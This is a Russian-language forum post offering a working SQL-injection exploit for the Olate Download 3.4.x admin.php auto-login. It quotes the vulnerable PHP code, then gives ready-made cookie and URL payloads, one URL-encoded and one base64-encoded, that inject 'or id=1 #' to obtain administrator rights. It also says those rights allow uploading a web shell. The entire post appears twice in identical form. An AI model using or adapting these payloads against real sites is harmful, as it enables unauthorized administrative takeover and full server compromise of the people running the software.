(Dm)
19.05.2008, 22:50
Оф сайт: http://www.olate.co.uk/od3
SQL-injection в admin.php
if (isset($input['OD3_AutoLogin']))
{
$parts = explode('::', plain_decrypt($input['OD3_AutoLogin']));
$hash = $parts[0];
$data = $parts[1];
$data = unserialize(stripslashes($data));
//print_r($data);
//exit;
// Give them nice names
$user_id = $data[0];
$username = $data[1];
$group_id = $data[2];
// Check the user exists
$result = $dbim->query('SELECT id
FROM '.DB_PREFIX.'users
WHERE (id = "'.$user_id.'")
AND (username = "'.$username.'")
AND (group_id="'.$group_id.'")');
if ((md5($user_id.$username.$group_id) == $hash) && $dbim->num_rows($result) == 1)
{
$uam->user_login($user_id, $username, $group_id);
}
В следствии чего имеем: получение прав администратора:
Exploit for <Olate Download 3.4.0 - 1>
Cookie: OD3_AutoLogin
de355f588b05f229aa1162cc9a3d16b5%3A%3Aa%3A3%3A%7Bi %3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A15%3A%22xek%2 2%29+or+id%3D1+%23%22%3Bi%3A2%3Bs%3A1%3A%222%22%3B %7D
Exploit for <Olate Download 3.4.2 - 3>
admin.php?OD3_AutoLogin=WkdVek5UVm1OVGc0WWpBMVpqSX lPV0ZoTVRFMk1tTmpPV0V6WkRFMllqVTZPbUU2TXpwN2FUb3dP M002TVRvaU1TSTdhVG94TzNNNk1UVTZJbmhsYTF3aUtTQnZjaU JwWkQweElDTWlPMms2TWp0ek9qRTZJaklpTzMwPQ==
Имея права администратора, можно загрузить на сервер веб шелл.
для тех кто в танке:
_http://www.securityfocus.com/bid/25343/info
_http://myimei.com/security/2007-08-16/olate-download-341adminphpauthentication-bypassing.html
Не имеют никакого отношения к этой уязвимости
SQL-injection в admin.php
if (isset($input['OD3_AutoLogin']))
{
$parts = explode('::', plain_decrypt($input['OD3_AutoLogin']));
$hash = $parts[0];
$data = $parts[1];
$data = unserialize(stripslashes($data));
//print_r($data);
//exit;
// Give them nice names
$user_id = $data[0];
$username = $data[1];
$group_id = $data[2];
// Check the user exists
$result = $dbim->query('SELECT id
FROM '.DB_PREFIX.'users
WHERE (id = "'.$user_id.'")
AND (username = "'.$username.'")
AND (group_id="'.$group_id.'")');
if ((md5($user_id.$username.$group_id) == $hash) && $dbim->num_rows($result) == 1)
{
$uam->user_login($user_id, $username, $group_id);
}
В следствии чего имеем: получение прав администратора:
Exploit for <Olate Download 3.4.0 - 1>
Cookie: OD3_AutoLogin
de355f588b05f229aa1162cc9a3d16b5%3A%3Aa%3A3%3A%7Bi %3A0%3Bs%3A1%3A%221%22%3Bi%3A1%3Bs%3A15%3A%22xek%2 2%29+or+id%3D1+%23%22%3Bi%3A2%3Bs%3A1%3A%222%22%3B %7D
Exploit for <Olate Download 3.4.2 - 3>
admin.php?OD3_AutoLogin=WkdVek5UVm1OVGc0WWpBMVpqSX lPV0ZoTVRFMk1tTmpPV0V6WkRFMllqVTZPbUU2TXpwN2FUb3dP M002TVRvaU1TSTdhVG94TzNNNk1UVTZJbmhsYTF3aUtTQnZjaU JwWkQweElDTWlPMms2TWp0ek9qRTZJaklpTzMwPQ==
Имея права администратора, можно загрузить на сервер веб шелл.
для тех кто в танке:
_http://www.securityfocus.com/bid/25343/info
_http://myimei.com/security/2007-08-16/olate-download-341adminphpauthentication-bypassing.html
Не имеют никакого отношения к этой уязвимости